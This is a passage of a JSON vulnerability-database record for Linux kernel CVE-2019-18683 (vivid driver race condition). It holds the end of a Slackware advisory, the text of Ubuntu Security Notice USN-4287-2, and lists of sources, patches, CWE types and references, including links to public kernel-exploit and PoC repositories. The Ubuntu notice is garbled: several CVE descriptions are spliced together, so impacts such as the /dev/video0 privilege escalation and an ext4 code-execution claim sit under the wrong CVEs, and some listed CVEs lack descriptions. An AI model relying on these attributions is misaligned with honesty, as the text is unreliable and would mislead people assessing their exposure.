Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address.      |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAl4WVEYACgkQakRjwEAQIjMljgCfTQKeQBRpNgxFhMtrKSwy0afq\nemEAoI4MwPctKJAsQZyfhUymhvQ6bWUh\n=xnPY\n-----END PGP SIGNATURE-----\n. ==========================================================================\nUbuntu Security Notice USN-4287-2\nFebruary 18, 2020\n\nlinux-azure vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-azure: Linux kernel for Microsoft Azure Cloud systems\n\nDetails:\n\nUSN-4287-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nkernel for Microsoft Azure Cloud systems for Ubuntu 14.04 ESM. \n\nIt was discovered that the Linux kernel did not properly clear data\nstructures on context switches for certain Intel graphics processors. A\nlocal attacker could use this to expose sensitive information. \n(CVE-2019-14615)\n\nIt was discovered that the Atheros 802.11ac wireless USB device driver in\nthe Linux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-15099)\n\nIt was discovered that the HSA Linux kernel driver for AMD GPU devices did\nnot properly check for errors in certain situations, leading to a NULL\npointer dereference. A local attacker could possibly use this to cause a\ndenial of service. (CVE-2019-16229)\n\nIt was discovered that the Marvell 8xxx Libertas WLAN device driver in the\nLinux kernel did not properly check for errors in certain situations,\nleading to a NULL pointer dereference. A local attacker could possibly use\nthis to cause a denial of service. An attacker with write access to /dev/video0 on\na system with the vivid module loaded could possibly use this to gain\nadministrative privileges. (CVE-2019-18683)\n\nIt was discovered that the Renesas Digital Radio Interface (DRIF) driver in\nthe Linux kernel did not properly initialize data. A local attacker could\npossibly use this to expose sensitive information (kernel memory). \n(CVE-2019-18786)\n\nIt was discovered that the Afatech AF9005 DVB-T USB device driver in the\nLinux kernel did not properly deallocate memory in certain error\nconditions. A local attacker could possibly use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2019-18809)\n\nIt was discovered that the btrfs file system in the Linux kernel did not\nproperly validate metadata, leading to a NULL pointer dereference. An\nattacker could use this to specially craft a file system image that, when\nmounted, could cause a denial of service (system crash). A local attacker could possibly use this to\ncause a denial of service (kernel memory exhaustion). (CVE-2019-19057)\n\nIt was discovered that the crypto subsystem in the Linux kernel did not\nproperly deallocate memory in certain error conditions. A local attacker\ncould use this to cause a denial of service (kernel memory exhaustion). \n(CVE-2019-19062)\n\nIt was discovered that the Realtek rtlwifi USB device driver in the Linux\nkernel did not properly deallocate memory in certain error conditions. A\nlocal attacker could possibly use this to cause a denial of service (kernel\nmemory exhaustion). (CVE-2019-19063)\n\nIt was discovered that the RSI 91x WLAN device driver in the Linux kernel\ndid not properly deallocate memory in certain error conditions. A local\nattacker could use this to cause a denial of service (kernel memory\nexhaustion). (CVE-2019-19071)\n\nIt was discovered that the Atheros 802.11ac wireless USB device driver in\nthe Linux kernel did not properly deallocate memory in certain error\nconditions. A local attacker could possibly use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2019-19078)\n\nIt was discovered that the AMD GPU device drivers in the Linux kernel did\nnot properly deallocate memory in certain error conditions. A local\nattacker could use this to possibly cause a denial of service (kernel\nmemory exhaustion). (CVE-2019-19082)\n\nDan Carpenter discovered that the AppleTalk networking subsystem of the\nLinux kernel did not properly handle certain error conditions, leading to a\nNULL pointer dereference. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2019-19227)\n\nIt was discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly handle ioctl requests to get emulated CPUID\nfeatures. An attacker with access to /dev/kvm could use this to cause a\ndenial of service (system crash). An attacker could use\nthis to specially craft an ext4 file system that, when mounted, could cause\na denial of service (system crash) or possibly execute arbitrary code. \n(CVE-2019-19767)\n\nGao Chuan discovered that the SAS Class driver in the Linux kernel\ncontained a race condition that could lead to a NULL pointer dereference. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-19965)\n\nIt was discovered that the Datagram Congestion Control Protocol (DCCP)\nimplementation in the Linux kernel did not properly deallocate memory in\ncertain error conditions. An attacker could possibly use this to cause a\ndenial of service (kernel memory exhaustion). (CVE-2019-20096)\n\nMitchell Frank discovered that the Wi-Fi implementation in the Linux kernel\nwhen used as an access point would send IAPP location updates for stations\nbefore client authentication had completed. A physically proximate attacker\ncould use this to cause a denial of service. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2020-7053)\n\nIt was discovered that the B2C2 FlexCop USB device driver in the Linux\nkernel did not properly validate device metadata. A physically proximate\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-15291)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  linux-image-4.15.0-1069-azure   4.15.0-1069.74~14.04.1\n  linux-image-azure               4.15.0.1069.55\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4287-2\n  https://usn.ubuntu.com/4287-1\n  CVE-2019-14615, CVE-2019-15099, CVE-2019-15291, CVE-2019-16229,\n  CVE-2019-16232, CVE-2019-18683, CVE-2019-18786, CVE-2019-18809,\n  CVE-2019-18885, CVE-2019-19057, CVE-2019-19062, CVE-2019-19063,\n  CVE-2019-19071, CVE-2019-19078, CVE-2019-19082, CVE-2019-19227,\n  CVE-2019-19332, CVE-2019-19767, CVE-2019-19965, CVE-2019-20096,\n  CVE-2019-5108, CVE-2020-7053\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-18683"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-18683"
      },
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "156418"
      },
      {
        "db": "PACKETSTORM",
        "id": "156125"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-18683",
        "trust": 3.2
      },
      {
        "db": "PACKETSTORM",
        "id": "155890",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/11/05/1",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/11/02/1",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "156427",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156125",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1745",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1745.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4584",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4793",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0851",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0305",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0766",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0572",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4704",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0830",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0572.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0141",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-066",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-18683",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156110",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156422",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156418",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156124",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-18683"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "156418"
      },
      {
        "db": "PACKETSTORM",
        "id": "156125"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "id": "VAR-201911-0712",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.625
  },
  "last_update_date": "2024-06-07T20:56:30.284000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "[PATCH v4 1/1] media: vivid: Fix wrong locking that causes race conditions on streaming stop",
        "trust": 0.8,
        "url": "https://lore.kernel.org/lkml/20191103221719.27118-1-alex.popov@linux.com/"
      },
      {
        "title": "Linux kernel Repair measures for the competition condition problem loophole",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=102033"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4254-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial, linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4254-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-aws-5.0, linux-gcp, linux-gke-5.0, linux-oracle-5.0 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4258-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-azure vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4287-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-azure-5.3, linux-gcp, linux-gcp-5.3, linux-hwe, linux-kvm, linux-oracle, linux-raspi2, linux-raspi2-5.3 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4284-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-hwe, linux-kvm, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4287-1"
      },
      {
        "title": "Linux kernel Exploitation tutorials \u0026 Practice\nTracing the Kernel\nKernel Bugs, vulnerabilities and exploitation techniques\nLinux Kernel Exploitation cve PoC/writeups \u0026 guides\nTalks from conferences (videos)\nMajor changes to source code\nAdditional Out of context resources\nSource code structs \u0026 fields of interest\nThe backyard/garage of the Linux kernel docs\nLinux internals\nVirtual memory areas datastructures (VMA)\nPage Tables and Process Memory internals \u0026 exploits\nVarious open source tools\nIn Chromium\nAndroid\nblogs\nMitigations",
        "trust": 0.1,
        "url": "https://github.com/idanbanani/linux-kernel-vr-exploitation "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/de4dcr0w/linux-kernel-eop-exp "
      },
      {
        "title": "Linux Kernel Exploitation",
        "trust": 0.1,
        "url": "https://github.com/tamilhackz/linux-kernel-exploitation "
      },
      {
        "title": "Linux Kernel Exploitation",
        "trust": 0.1,
        "url": "https://github.com/khanhdz191/linux-kernel-exploitation "
      },
      {
        "title": "Linux Kernel Exploitation",
        "trust": 0.1,
        "url": "https://github.com/xairy/linux-kernel-exploitation "
      },
      {
        "title": "PoC in GitHub",
        "trust": 0.1,
        "url": "https://github.com/developer3000s/poc-in-github "
      },
      {
        "title": "Github CVE Monitor",
        "trust": 0.1,
        "url": "https://github.com/khulnasoft-lab/awesome-security "
      },
      {
        "title": "PoC in GitHub",
        "trust": 0.1,
        "url": "https://github.com/hectorgie/poc-in-github "
      },
      {
        "title": "Github CVE Monitor",
        "trust": 0.1,
        "url": "https://github.com/khulnasoft-labs/awesome-security "
      },
      {
        "title": "Awesome CVE PoC",
        "trust": 0.1,
        "url": "https://github.com/lnick2023/nicenice "
      },
      {
        "title": "Awesome CVE PoC",
        "trust": 0.1,
        "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
      },
      {
        "title": "PoC in GitHub",
        "trust": 0.1,
        "url": "https://github.com/0xt11/cve-poc "
      },
      {
        "title": "Awesome CVE PoC",
        "trust": 0.1,
        "url": "https://github.com/qazbnm456/awesome-cve-poc "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-18683"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.8
      },
      {
        "problemtype": "CWE-416",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "https://usn.ubuntu.com/4254-1/"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/155890/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 2.3,
        "url": "https://usn.ubuntu.com/4254-2/"
      },
      {
        "trust": 2.3,
        "url": "https://usn.ubuntu.com/4258-1/"
      },
      {
        "trust": 2.3,
        "url": "https://usn.ubuntu.com/4287-1/"
      },
      {
        "trust": 2.3,
        "url": "https://usn.ubuntu.com/4287-2/"
      },
      {
        "trust": 2.3,
        "url": "https://usn.ubuntu.com/4284-1/"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18683"
      },
      {
        "trust": 1.7,
        "url": "https://www.openwall.com/lists/oss-security/2019/11/02/1"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/11/05/1"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20191205-0001/"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00029.html"
      },
      {
        "trust": 1.7,
        "url": "https://seclists.org/bugtraq/2020/jan/10"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
      },
      {
        "trust": 1.1,
        "url": "https://lore.kernel.org/lkml/20191103221719.27118-1-alex.popov%40linux.com/"
      },
      {
        "trust": 0.9,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18683"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15291"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19332"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19227"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19063"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19057"
      },
      {
        "trust": 0.6,
        "url": "https://lore.kernel.org/lkml/20191103221719.27118-1-alex.popov@linux.com/"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193200-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4286-2/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4286-1/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4285-1/"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193381-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2020/suse-su-20200093-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4255-2/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4253-2/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4255-1/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4253-1/"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193316-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193317-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156427/ubuntu-security-notice-usn-4287-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/pixel/2020-06-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4704/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0305/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4793/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0572.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0851/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1745.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4584/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0830/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156125/ubuntu-security-notice-usn-4258-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0572/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0141/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-privilege-escalation-via-drivers-media-platform-vivid-31091"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1745/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18885"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19062"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15099"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19078"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19071"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19767"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19082"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19965"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16229"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16232"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18786"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4254-1"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4287-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20096"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18809"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7053"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5108"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19077"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19050"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19252"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/362.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://seclists.org/oss-sec/2019/q4/43"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-173.203"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1128.137"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1101.112"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1132.140"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1065.72"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19332"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19063"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15291"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19338"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15917"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19057"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19227"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19062"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15917"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19338"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1072.79"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1053.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1071.76"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1060.62"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-88.88~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1033.36~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1052.55"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1055.59"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1055.59"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1060.62~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1033.36"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-88.88"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4287-2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19241"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18811"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.3.0-1009.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.3/5.3.0-1013.14~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4284-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.3.0-40.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19947"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.3/5.3.0-1012.13~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-40.32~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2-5.3/5.3.0-1018.20~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1018.20"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19602"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1010.11"
      },
      {
        "trust": 0.1,
